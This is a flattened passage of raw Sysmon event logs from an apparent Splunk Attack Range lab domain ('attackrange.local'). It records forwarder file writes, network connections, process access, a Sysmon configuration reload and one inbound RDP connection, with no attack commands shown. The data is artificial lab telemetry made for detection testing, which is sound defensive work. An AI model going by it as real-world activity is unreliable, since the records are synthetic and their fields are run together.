n-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 23542300x80000000000000001048876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.116{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8E4AF6AF59B5228E63E9873E77AE3C2,SHA256=C137FE1305138A93D8F6D7755D4A39CA1AF38F7B7A825038D087580E2DB13953,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:09.221{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57263-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:11.573{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF06C9D4A3864A2719ED9F7EA2BDA294,SHA256=64AE46F8E6E8359C54D3B091729413AE55A28BC41538D5DA487811E52E2276EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:11.131{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=291088AB30D833DE1085169132CBFFE7,SHA256=229183F40439E3B87B2C6402F9581ABE3DDB5A7257E2ECE660176A214AEE8047,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:02.744{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51021-false10.0.1.12-8000- 23542300x8000000000000000807524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:12.635{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668E2AFB4B17F812939F401F6490A95F,SHA256=7A64702F502281D06565CC4A8AC1B5AC19E2F735658007FA89FFAE43F36CB3CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:12.148{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF94EA8DDFF98EDE386F3F5138AFABC4,SHA256=D0F597FBB75082BEE018F6D2B314172CD2BA5765C5402DEA400CB491A0852058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:13.682{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038868AC652154A48765E66E0EDCF454,SHA256=1AD4ABD3D62B79C0D063DBC96052F2098E1EEF83E66887694E211C66AFED495F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:13.151{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A47857442B865F83FDD143AEEF8BF692,SHA256=C10A87AA17E0703A2A8F4C64595F54BF77EFD7E22D4C63091AE7F37EC9667EEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:14.725{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C99F6FB76DE4659B6147104AE717B37,SHA256=B0C7F15C3F03B57A21EC3454C455B1572E1CD3F027BCEDA3C78F85804C6AEC31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:14.412{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09BA4ED778BC7F512BD93175B4B8D69F,SHA256=2EC75809DF32B07AFC0102CB881CBF325E3128ED9F0CD2F4ABE0B533D6DAFCFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:14.181{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BDC6AA381BE2555168E4F2D0FB451BF,SHA256=A4B1FF938FC2A5F0186620E1D03B1FF5FEF4BAFCA9754E56EFFA6D11B88E1889,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:15.757{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCD90EAA6C1D5720F9B07C66DB846FE5,SHA256=42F2B36B31F491241498E2D9896957B481B018D6F1C4D168DED935619BC2133D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:06.307{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-63329-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001048888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:15.212{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B2FF5ECC8CCF5EA8467F39FDE7B2513,SHA256=D78954E5002A61BE8248B77F603340E7F8184B08139529304789774D40438699,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:14.389{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57264-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:16.788{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2EB4AD65BFB7CDB5B23D1EC1B1E90F,SHA256=EC5896610DB9959334B7E880E77D5DDB2D35D2D98B4BCD30FA633433CD47035E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:16.828{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:16.213{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C522021892420DF27FA6D91F6F9CAC4C,SHA256=DA9EF58F524166AFECFF8B68C0F67CEB7619CAEBE756411C635D14E90BD062F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:17.819{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2143DC81A311B2148619F88A46867A5E,SHA256=2ADE837B3AF8EFC44B7BA0B584CFF50556E159AEC4D325C4583A7EE12BC17E74,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:08.708{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51023-false10.0.1.12-8000- 354300x80000000000000001048894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:07.940{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51022-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001048893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:07.940{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51022-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001048892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:17.246{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37F692CDCBD3E7263D3002D15A0C682E,SHA256=DD525359D3C33808F237DA323AE7AE3F1064D7005502B5ECD6A959054C38F957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:18.866{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4517A2A114A1C7558EF76755796FBEF,SHA256=6C9CA8149F9D12A49D0C6DB723B2F50A142803C30D8FA1FD5A51199BC8D9F15D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:18.279{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37CECDAB519D823E9BA8023EC2ACF55E,SHA256=3844AEE61E46ED8FDFAB24C850708869794054BAAA604AD1023BB79365D8B33A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:18.279{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:19.866{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52A4A84BE68E455BCD8D090B833ED804,SHA256=269F4BD44970C75D5B57C69A5FD6D57D93F60C7AE31381F2D829F2473D58400E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001048898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:19.309{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25E4CF62574BF692E46BF150DA3483C9,SHA256=ECD762CD5288E2914AF5E4A249DDE536FFC9A377DD6EA0840F0190D1F277C618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:20.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B746A1CAD6FEE269B09E5731C4325039,SHA256=942D03A7BE0611344CE836D1A0156D855FE408F02CDD1A169CB5D8F0513AF81B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:20.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14819F5C1AFDE3FD40B0B4070048C012,SHA256=32642CF2D413998B80F2AF4E76FE22F7DEB076FABA622E01DAC611579051021C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:20.475{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:21.913{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5A9BC8732A5B5B5C6529648B8EECF5,SHA256=B0F0F88EA82F116BD94F92FBAFAD41C5EEF1D57DFAC114F3B1787D922B2888AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:21.341{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=232D646E7074713359604B03A519A895,SHA256=293A9D15101BF4DE691A8736C3115FBCB6E70311BEA844DB04A93AB8CB0F2A82,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:20.608{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57266-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000807535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:20.280{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57265-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:22.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D1715EEBED21D3D9156C8D48AEB7A75,SHA256=17A5706B2FD0BC8EC55DD0CA211705F53D4C36E58D13DE1B35A74349F61E1199,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001048923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.572{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigHashSHA256=75358E8028A9D2A1CC1782C71200ED0E529269E98BDC3389937C592CA9D2EB8F 13241300x80000000000000001048922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.572{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigFileC:\Program Files\ansible\AttackRangeSysmon.xml 16341600x80000000000000001048921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local2021-07-12 07:52:22.572C:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=75358E8028A9D2A1CC1782C71200ED0E529269E98BDC3389937C592CA9D2EB8F 13241300x80000000000000001048920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.572{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\RulesBinary Data 13241300x80000000000000001048919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookupBinary Data 13241300x80000000000000001048918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocationBinary Data 13241300x80000000000000001048917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithmDWORD (0x8000000e) 13241300x80000000000000001048916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\OptionsDWORD (0x00000007) 12241200x80000000000000001048915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Rules 12241200x80000000000000001048914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookup 12241200x80000000000000001048913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocation 
12241200x80000000000000001048912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithm 12241200x80000000000000001048911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Options 23542300x80000000000000001048910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.527{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=03C012F1D044BB547A3D7C73277F07AA,SHA256=7E8FD39DD5A96B786D76CE084388F0511C1F24AA91014F10E90B236A5ADD35D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:22.460{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
